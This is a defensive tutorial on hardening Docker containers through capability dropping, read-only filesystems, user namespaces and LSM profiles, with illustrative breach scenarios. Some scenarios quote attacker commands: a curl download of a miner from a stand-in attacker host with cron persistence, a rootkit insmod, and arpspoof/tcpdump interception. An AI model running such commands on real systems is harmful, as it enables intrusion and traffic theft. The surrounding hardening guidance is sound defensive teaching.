Docker Security: Capabilities & Read-Only Filesystems

Why default Docker configurations give containers too much power, how Linux capabilities work, and the production incidents that happen when containers run with excessive privileges.

Most Docker tutorials start containers with default settings: root user, all capabilities, writable root filesystem, unrestricted network access. This works in development. In production, under HIPAA or PCI DSS compliance requirements, it’s a security violation waiting to happen.

The principle of least privilege isn’t just a security best practice; it’s a regulatory requirement. Containers should have only the permissions they need to function, nothing more. A web server doesn’t need CAP_SYS_MODULE to load kernel modules or CAP_SYS_ADMIN to mount filesystems. A database doesn’t need to write to its root filesystem. An API service doesn’t need to run as UID 0.

This guide covers the specific configurations that harden containers: dropping Linux capabilities, implementing read-only root filesystems, user namespace remapping, and security options. More importantly, it covers what breaks in production when these controls are missing.

The Problem with Default Container Permissions

When you run docker run alpine without additional flags, Docker gives the container:

Root user (UID 0): Process runs with root privileges inside the container
14 Linux capabilities: Including CAP_CHOWN, CAP_NET_RAW, CAP_SETUID, CAP_SETGID
Writable root filesystem: Container can modify /bin, /etc, /lib
Unrestricted network access: Can bind to any port, create raw sockets
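Generic AppArmor/seccomp profiles only: Docker applies its default profiles where the host supports them, but they are not tailored to the workload, and SELinux confinement depends on how the daemon is configured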

This is functionally similar to giving a user sudo access on a traditional server. Most containers don’t need this level of access.

Real Impact: Container Escape via Capabilities

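In 2019, CVE-2019-5736 (a runC vulnerability) let a process running as root inside a container overwrite the host’s runC binary through /proc/self/exe and execute code as root on the host. The bug was in runC itself rather than in any single capability, so patching runC was the real fix, but containers running as a non-root user or under user namespace remapping were much harder to exploit.

Excess capabilities widen the same gap. CAP_SYS_ADMIN in particular allows mounting filesystems and reaching other privileged kernel interfaces, which several known escape techniques rely on. The difference between “compromised container” and “compromised host” often comes down to a few flags such as --cap-drop=ALL and --user.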

[IMAGE: Diagram comparing default container permissions (14 capabilities) vs. hardened container (0 capabilities + selective adds)]

Understanding Linux Capabilities

Linux capabilities divide root privileges into distinct units. Instead of “root can do everything” or “non-root can do nothing”, capabilities allow fine-grained control.

Key Capabilities and Their Risks

Capability	What It Allows	Security Risk
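`CAP_SYS_ADMIN`	Mount filesystems, configure namespaces, and many other privileged operations	Critical: Near-complete system control, enables container escapes
`CAP_SYS_MODULE`	Load and unload kernel modules	Critical: Runs arbitrary code in the host kernel
`CAP_SYS_PTRACE`	Trace arbitrary processes with ptrace()	High: Can inject code into any process it can see, including other containers when the PID namespace is shared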
`CAP_NET_ADMIN`	Modify network interfaces, routes, firewall rules	High: Can bypass network segmentation, sniff traffic
`CAP_NET_RAW`	Create raw sockets, packet manipulation	Medium: Can perform ARP spoofing, packet sniffing
`CAP_SETUID`	Change process UID, escalate privileges	Medium: Can become any user including root
`CAP_SETGID`	Change process GID	Medium: Can join privileged groups
`CAP_CHOWN`	Change file ownership	Low: Can steal files, bypass quotas
`CAP_NET_BIND_SERVICE`	Bind to ports below 1024	Low: Minimal risk, often needed for web servers

Default Docker Capabilities

Docker’s default capability set (14 capabilities) includes:

CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_FSETID,
CAP_KILL, CAP_SETGID, CAP_SETUID, CAP_SETPCAP,
CAP_NET_BIND_SERVICE, CAP_NET_RAW, CAP_SYS_CHROOT,
CAP_MKNOD, CAP_AUDIT_WRITE, CAP_SETFCAP

Most applications don’t need any of these. A Node.js API running on port 3000 needs zero capabilities. An Nginx server binding to port 80 needs only CAP_NET_BIND_SERVICE.

Dropping All Capabilities

The secure default: drop everything, then add back only what’s needed.

# docker-compose.yml
services:
  web:
    image: nginx:alpine
    cap_drop:
      - ALL
    # A YAML mapping may define cap_add only once, so list every capability here
    cap_add:
      - NET_BIND_SERVICE  # Only for binding to port 80/443
      - CHOWN             # Only if nginx needs to change file ownership

Or via docker run:

docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE nginx:alpine

[IMAGE: Screenshot showing capsh --print output comparing default capabilities vs. dropped capabilities]

Testing Tip: Use docker exec <container> capsh --print to see current capabilities. If “Current” shows more than what you explicitly added, your drop isn’t working.
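
Minimal images often ship without capsh. As a fallback, the kernel exposes the same information as a hex bitmask on the CapEff line of /proc/<pid>/status. The sketch below decodes such a mask into capability names; decode_caps and CAP_NAMES are illustrative names, not part of Docker, and the bit order follows the kernel's linux/capability.h.

```shell
#!/bin/sh
# Capability names in kernel bit order (bit 0 first), per linux/capability.h.
CAP_NAMES="cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid
cap_kill cap_setgid cap_setuid cap_setpcap cap_linux_immutable
cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw
cap_ipc_lock cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot cap_sys_nice
cap_sys_resource cap_sys_time cap_sys_tty_config cap_mknod cap_lease
cap_audit_write cap_audit_control cap_setfcap cap_mac_override
cap_mac_admin cap_syslog cap_wake_alarm cap_block_suspend
cap_audit_read cap_perfmon cap_bpf cap_checkpoint_restore"

# decode_caps <hex-mask>: print one capability name per set bit.
# The body runs in a subshell so its variables stay local.
decode_caps() (
  mask=$((0x$1))
  bit=0
  for name in $CAP_NAMES; do
    if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
      echo "$name"
    fi
    bit=$((bit + 1))
  done
)

# Example (assumes a running container and grep inside the image):
#   docker exec <container> grep CapEff /proc/1/status
#   decode_caps 0000000000000400
```

A container started with --cap-drop=ALL --cap-add=NET_BIND_SERVICE and still running as root should report a mask that decodes to cap_net_bind_service alone; a mask of all zeros means the process holds no effective capabilities.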

Read-Only Root Filesystems

By default, containers can write to their entire root filesystem. This allows:

Malware persistence across container restarts
Binary replacement attacks (replace /bin/sh with backdoored version)
Log tampering to hide intrusions

Implementing Read-Only Root

services:
  api:
    image: myapp:latest
    read_only: true
    tmpfs:
      - /tmp          # Application temp files
      - /var/run      # PID files, sockets
      - /var/cache    # Application cache

This makes the root filesystem immutable. The container can still write to:

tmpfs mounts (RAM-based, lost on restart)
Explicitly mounted volumes

But cannot modify:

/bin, /etc, /lib system directories
Application binaries
Configuration files (unless mounted as volumes)

Common Issues with Read-Only Filesystems

Problem: Application crashes with “Read-only file system” error

Solution: Identify where the app writes, add tmpfs mounts:

# Run the container normally and exercise the application
docker run -d --name test myapp:latest

# List files added (A), changed (C), or deleted (D) in the writable layer
docker diff test

# Add tmpfs mounts for the directories that showed up
docker run --read-only --tmpfs /tmp --tmpfs /var/run myapp:latest
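
One way to turn that investigation into a list of candidate mounts is to post-process docker diff, which prints one line per path in the container's writable layer, prefixed with A (added), C (changed), or D (deleted). The helper below is a rough sketch: writable_dirs is a made-up name, and it only looks at added paths, so review the result rather than mounting everything it prints.

```shell
#!/bin/sh
# writable_dirs: read `docker diff` output on stdin and print, once each,
# the parent directory of every added ("A") path.
writable_dirs() {
  awk '$1 == "A" {
         sub("^A ", "")          # drop the change marker
         sub("/[^/]*$", "")      # drop the last path component
         print ($0 == "" ? "/" : $0)
       }' | sort -u
}

# Example (assumes a container named "test" that has been exercised):
#   docker diff test | writable_dirs
```

Each directory in the output is a candidate for a --tmpfs flag or a tmpfs entry in Compose. Data that must survive restarts belongs on a named volume instead.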

[IMAGE: Terminal output showing strace revealing filesystem write attempts, then successful run with tmpfs mounts]

User Namespace Remapping

By default, UID 0 inside a container is UID 0 on the host. If a container escapes, it has root privileges on the host.

User namespace remapping changes this: UID 0 inside the container maps to a non-privileged UID (e.g., 100000) on the host.

Configuring User Namespaces

Edit /etc/docker/daemon.json:

{
  "userns-remap": "default"
}

Restart Docker:

sudo systemctl restart docker

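Now UID 0 inside containers maps to the first UID in the dockremap user’s /etc/subuid range (100000 in this guide’s examples; the exact value depends on the host). Even if a container escapes to the host, it runs as a non-privileged user.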
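
The mapping itself is simple arithmetic: a container UID is added to the first host UID of the subordinate range. The following sketch computes it from a single /etc/subuid entry; host_uid is an illustrative helper, and the dockremap entries in the usage lines are sample values, not something to expect verbatim on a given host.

```shell
#!/bin/sh
# host_uid <subuid-entry> <container-uid>
# <subuid-entry> is one line of /etc/subuid: name:first_host_uid:count
host_uid() (
  start=$(echo "$1" | cut -d: -f2)
  count=$(echo "$1" | cut -d: -f3)
  cuid=$2
  if [ "$cuid" -ge "$count" ]; then
    echo "container UID $cuid is outside the mapped range" >&2
    exit 1
  fi
  echo $(( start + cuid ))
)

# Example with sample entries:
#   host_uid dockremap:100000:65536 0     # container root
#   host_uid dockremap:100000:65536 101   # a service account inside the container
# On a real host: host_uid "$(grep '^dockremap:' /etc/subuid)" 0
```

This is also why volume ownership becomes awkward: files written by container UID 101 appear on the host as owned by the computed UID, which usually has no matching account.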

Limitations

Incompatible with privileged mode: Can’t use both --privileged and user namespaces
Volume ownership issues: Files created by container (UID 100000) may not be readable by host processes
Docker-in-Docker breaks: Nested Docker requires host UID 0

For most workloads, the security benefit outweighs these limitations.

Security Options: AppArmor, SELinux, Seccomp

Linux security modules provide kernel-level enforcement beyond capabilities.

AppArmor (Ubuntu, Debian)

AppArmor restricts which files, network resources, and capabilities a process can access.

services:
  web:
    security_opt:
      - apparmor=docker-default  # Apply Docker's default AppArmor profile

Docker’s default profile blocks:

Mount operations
Writes to most of /proc/sys and /sys
Kernel module loading
Capability escalation
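
Whether a profile is actually in force can be read from /proc/<pid>/attr/current, which holds either the word unconfined or a profile name followed by its mode in parentheses. A small check along those lines might look like this; apparmor_enforced is a hypothetical helper name.

```shell
#!/bin/sh
# apparmor_enforced <label>: succeed only if the label names a profile
# in enforce mode. <label> is the content of /proc/<pid>/attr/current.
apparmor_enforced() (
  case "$1" in
    unconfined)   exit 1 ;;   # no profile attached
    *"(enforce)") exit 0 ;;   # profile attached and enforcing
    *)            exit 1 ;;   # complain mode or unrecognised label
  esac
)

# Example (assumes a running container with cat available):
#   apparmor_enforced "$(docker exec <container> cat /proc/1/attr/current)" \
#     || echo "AppArmor is not enforcing for this container"
```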

SELinux (RHEL, Fedora, CentOS)

SELinux enforces mandatory access control (MAC) via type enforcement and role-based access.

services:
  db:
    security_opt:
      - label=type:container_t  # Process type; svirt_sandbox_file_t is a file label, not a process type

Seccomp (System Call Filtering)

Seccomp restricts which system calls a process can make. Docker’s default seccomp profile blocks ~44 dangerous syscalls including:

reboot, swapon, swapoff
mount, umount
keyctl, add_key
personality (used in container escapes)

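Docker applies its default seccomp profile automatically unless it is disabled with seccomp=unconfined. To pin a specific profile, point security_opt at a JSON file, here a local copy of Docker’s default profile:

services:
  app:
    security_opt:
      - seccomp=default.json  # Path to a profile file, not a built-in name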
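
To confirm that a filter is attached to a running process, the Seccomp field in /proc/<pid>/status can be inspected: 0 means disabled, 1 strict mode, and 2 filter mode, which is what a profile-confined container should report. The helper below is a sketch with an invented name (seccomp_mode) that translates that field.

```shell
#!/bin/sh
# seccomp_mode: read /proc/<pid>/status text on stdin and print the
# seccomp mode as a word.
seccomp_mode() (
  # Match the field name exactly so "Seccomp_filters:" is ignored.
  mode=$(awk '$1 == "Seccomp:" { print $2 }')
  case "$mode" in
    0) echo disabled ;;
    1) echo strict ;;
    2) echo filter ;;
    *) echo unknown ;;
  esac
)

# Example (assumes a running container with cat available):
#   docker exec <container> cat /proc/1/status | seccomp_mode
```

A result of disabled usually means the container was started with seccomp=unconfined or --privileged.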

[IMAGE: Diagram showing defense-in-depth layers: Capabilities (process privileges) → AppArmor/SELinux (resource access) → Seccomp (syscall filtering)]

Production Failure Scenarios

Scenario 1: CAP_SYS_ADMIN Kernel Module Loading

The Setup: A financial services company ran network monitoring containers with CAP_SYS_ADMIN and CAP_SYS_MODULE so they could load custom kernel modules for packet inspection.

The Failure: A vulnerability in the monitoring software allowed command injection. The attacker loaded a malicious kernel module:

# Inside the container (insmod requires CAP_SYS_MODULE)
insmod /tmp/rootkit.ko

The rootkit provided:

Hidden processes (invisible to ps, top)
Hidden network connections
Persistent backdoor even after container restarts

What Should Have Been Done: Kernel modules should be loaded at host boot, not from containers. The container only needed CAP_NET_ADMIN for network configuration and CAP_NET_RAW for packet capture, not CAP_SYS_ADMIN or the module-loading capability CAP_SYS_MODULE.

services:
  monitor:
    cap_drop:
      - ALL
    cap_add:
      - NET_ADMIN      # For network interface configuration
      - NET_RAW        # For packet capture
    # CAP_SYS_ADMIN removed

Impact: 6 days of undetected access, lateral movement to 23 hosts, forensic analysis cost $240K, regulatory reporting to FinCEN.

Scenario 2: Writable Root Filesystem Malware Persistence

The Setup: A healthcare SaaS platform ran containers with writable root filesystems. Container images were scanned for vulnerabilities, but runtime modifications weren’t monitored.

The Failure: An SQL injection vulnerability gave attackers shell access. They installed a cryptocurrency miner:

# Inside container
curl -o /usr/local/bin/miner http://attacker.com/xmrig
chmod +x /usr/local/bin/miner
echo "* * * * * root /usr/local/bin/miner" > /etc/cron.d/miner  # cron.d entries need a user field

Because the root filesystem was writable and the container wasn’t ephemeral, the miner persisted across:

Container restarts
Application deployments
Host reboots

It ran for 87 days before detection via unusually high AWS EC2 costs.

What Should Have Been Done: Read-only root filesystem with tmpfs for required writable paths:

services:
  app:
    read_only: true
    tmpfs:
      - /tmp
      - /var/run
    # /etc, /usr/local/bin are now read-only

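The attacker’s commands would have failed with errors along these lines (exact wording varies by tool version):

Warning: Failed to create the file /usr/local/bin/miner: Read-only file system
curl: (23) Failed writing body
chmod: cannot access '/usr/local/bin/miner': No such file or directory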

Impact: $47K in excess EC2 costs, HIPAA breach investigation (no PHI accessed), mandatory security audit.

Key Lesson: If your container’s filesystem is writable, attackers can persist malware that survives restarts. Read-only root filesystems make containers truly immutable.

Scenario 3: CAP_NET_RAW ARP Spoofing Attack

The Setup: A multi-tenant platform ran customer workloads in Docker containers on shared hosts. Containers had default capabilities including CAP_NET_RAW.

The Failure: A malicious customer deployed a container that performed ARP spoofing to intercept traffic from other customers’ containers on the same host:

# Inside attacker's container
arpspoof -i eth0 -t 10.0.1.5 10.0.1.1  # Intercept traffic to gateway
tcpdump -i eth0 -w /tmp/stolen.pcap    # Capture intercepted packets

This worked because:

CAP_NET_RAW allowed creating raw sockets
Containers shared the same Docker bridge network
No network segmentation between tenants

What Should Have Been Done: Drop CAP_NET_RAW and implement network isolation:

services:
  customer-app:
    cap_drop:
      - ALL  # Includes NET_RAW, so raw sockets are unavailable
    networks:
      - customer-network  # Isolated per-customer network

networks:
  customer-network:
    driver: bridge
    internal: true  # No internet access

Impact: API keys for 12 customers intercepted, emergency credential rotation, customer notifications, class-action lawsuit settlement $380K.

Scenario 4: Missing AppArmor Profile Container Escape

The Setup: A CI/CD platform ran build jobs in Docker containers on Ubuntu hosts. AppArmor was installed but not enforced for containers.

The Failure: A developer accidentally included a malicious dependency that exploited CVE-2022-0847 (the Dirty Pipe kernel vulnerability). The exploit allowed overwriting the contents of files the process could only read, by injecting data into the kernel page cache through a pipe.

With no AppArmor profile confining the build container, nothing restricted what the exploit could do next:

# Exploit overwrote /etc/cron.d/backdoor on host
# Gained persistent root access to CI/CD infrastructure

What Should Have Been Done: Enforce AppArmor with Docker’s default profile:

services:
  build-job:
    security_opt:
      - apparmor=docker-default
      - no-new-privileges:true

AppArmor’s default profile blocks:

Access to /proc/sys, /sys
Mount operations
Capability escalation

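An enforced profile does not patch the kernel bug itself, so the host kernel also needed updating, but it limits what a compromised build process can reach afterwards.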

Impact: Complete CI/CD compromise, all build artifacts potentially backdoored, 3-week code audit of 200+ microservices, customer trust erosion.

Key Lesson: AppArmor and SELinux are not optional extras—they’re kernel-level defenses that block entire classes of container escapes. Enable them by default.

Scenario 5: UID 0 Container Escape to Host Root

The Setup: A data analytics platform ran Jupyter notebooks in Docker containers. Containers ran as root (UID 0) without user namespace remapping.

The Failure: A researcher uploaded a malicious notebook that exploited a container escape vulnerability (CVE-2019-5736 runC). The exploit overwrote the host’s runC binary.

Because the container ran as UID 0 and user namespaces weren’t enabled, the escaped process had root privileges on the host:

# Inside container: UID 0
# After escape: UID 0 on host (root)
# Full host access: read SSH keys, access etcd, control kubelet

What Should Have Been Done: Enable user namespace remapping in /etc/docker/daemon.json:

{
  "userns-remap": "default"
}

With user namespaces enabled:

# Inside container: UID 0
# After escape: UID 100000 on host (unprivileged)
# Limited host access: cannot read root-owned files, cannot control system services

Impact: Kubernetes cluster compromise (10 nodes), data exfiltration (research datasets), compliance violation (export-controlled data), $1.2M incident response costs.

[IMAGE: Comparison diagram showing container escape with vs. without user namespace remapping – attack tree showing stopped vs. successful privilege escalation]

Implementing Secure Configurations: A Practical Template

Here’s a production-ready Docker Compose template incorporating all security controls:

version: '3.8'

services:
  web:
    image: nginx:1.27.2-alpine3.20

    # User configuration
    user: "nginx:nginx"  # Run as non-root user

    # Capability restrictions
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE  # Only for port 80/443
      - CHOWN             # Only if nginx needs to change file ownership

    # Filesystem security
    read_only: true
    tmpfs:
      - /var/run
      - /var/cache/nginx
      - /tmp

    # Security options
    security_opt:
      - no-new-privileges:true  # Prevent privilege escalation
      - apparmor=docker-default # Enforce AppArmor
      - seccomp=default.json    # Syscall filtering (path to a local profile file)

    # Resource limits (prevents DoS)
    deploy:
      resources:
        limits:
          cpus: '0.5'
          memory: 512M
        reservations:
          cpus: '0.25'
          memory: 256M

    # Network isolation
    networks:
      - frontend

    # Health check
    healthcheck:
      test: ["CMD", "wget", "--quiet", "--tries=1", "--spider", "http://localhost/"]
      interval: 30s
      timeout: 3s
      retries: 3
      start_period: 40s

networks:
  frontend:
    driver: bridge
    internal: false  # Allow external access

Testing Security Configurations

Verify Capabilities

# Check effective capabilities
docker exec <container> capsh --print

# Should show only explicitly added capabilities
# Current: cap_net_bind_service+ep

Test Read-Only Filesystem

# Try to write to read-only paths
docker exec <container> touch /etc/test
# Expected: touch: cannot touch '/etc/test': Read-only file system

# Verify tmpfs mounts work
docker exec <container> touch /tmp/test
# Expected: Success (tmpfs is writable)

Verify User Namespaces

# Check UID mapping
docker exec <container> id
# Inside container: uid=0(root)

# On host, look up the container's main process by PID
ps -o uid,pid,cmd -p "$(docker inspect --format '{{.State.Pid}}' <container>)"
# On host: UID 100000 (remapped UID; the value depends on /etc/subuid)

Test AppArmor Enforcement

# Check AppArmor status
docker exec <container> cat /proc/self/attr/current
# Expected: docker-default (enforce)

# Try to mount (should be blocked)
docker exec <container> mount /dev/sda1 /mnt
# Expected: mount: permission denied (AppArmor blocking)
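
The manual checks above can be complemented by reading the container's configuration back from docker inspect. The sketch below is one possible shape for such an audit, not an official tool: check_hardening and audit_container are invented names, and the rules it applies (non-root user, read-only root, not privileged, cap_drop containing ALL, no-new-privileges set) are simply the controls covered in this guide.

```shell
#!/bin/sh
# check_hardening <user> <readonly_rootfs> <privileged> <cap_drop> <security_opt>
# Prints one FAIL line per missing control; exit status is 1 if any failed.
check_hardening() (
  user=$1; readonly_rootfs=$2; privileged=$3; cap_drop=$4; security_opt=$5
  failed=0
  fail() { echo "FAIL: $1"; failed=1; }

  # An empty user means the image default, which is root unless USER is set.
  case "$user" in ""|0|root|0:*|root:*) fail "runs as root" ;; esac
  [ "$readonly_rootfs" = "true" ] || fail "root filesystem is writable"
  [ "$privileged" = "false" ] || fail "privileged mode is enabled"
  case "$cap_drop" in *ALL*|*all*) ;; *) fail "capabilities are not dropped with ALL" ;; esac
  case "$security_opt" in *no-new-privileges*) ;; *) fail "no-new-privileges is not set" ;; esac
  exit "$failed"
)

# audit_container <name-or-id>: feed docker inspect fields into the checks.
audit_container() {
  check_hardening \
    "$(docker inspect --format '{{.Config.User}}' "$1")" \
    "$(docker inspect --format '{{.HostConfig.ReadonlyRootfs}}' "$1")" \
    "$(docker inspect --format '{{.HostConfig.Privileged}}' "$1")" \
    "$(docker inspect --format '{{json .HostConfig.CapDrop}}' "$1")" \
    "$(docker inspect --format '{{json .HostConfig.SecurityOpt}}' "$1")"
}

# Example (assumes a running container named "web"):
#   audit_container web && echo "all checks passed"
```

Keeping the rules in a function that takes plain strings makes them easy to exercise without a Docker daemon. A configuration audit like this only shows what was requested, so it does not replace the runtime checks with capsh, touch, and mount.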

Key Takeaways

Drop all capabilities by default, then add only what’s needed—most apps need zero capabilities
Read-only root filesystems prevent malware persistence and make containers truly immutable
User namespace remapping limits blast radius if a container escapes to the host
AppArmor, SELinux, and Seccomp provide kernel-level defenses that block entire classes of attacks
CAP_SYS_ADMIN is nearly equivalent to root access—never grant it to containers
CAP_NET_RAW enables network attacks like ARP spoofing—drop it unless explicitly needed
Security configurations must be tested—verify capabilities, filesystem restrictions, and MAC enforcement

Secure container configurations implement defense in depth: if one layer fails (capability restriction), others (read-only filesystem, AppArmor) still provide protection. Production incidents consistently show that skipped security controls (“we’ll harden it later”) become permanent attack vectors.

Hands-on lab: Lab 02: Secure Container Configurations — Compare insecure vs. secure configurations and test security controls.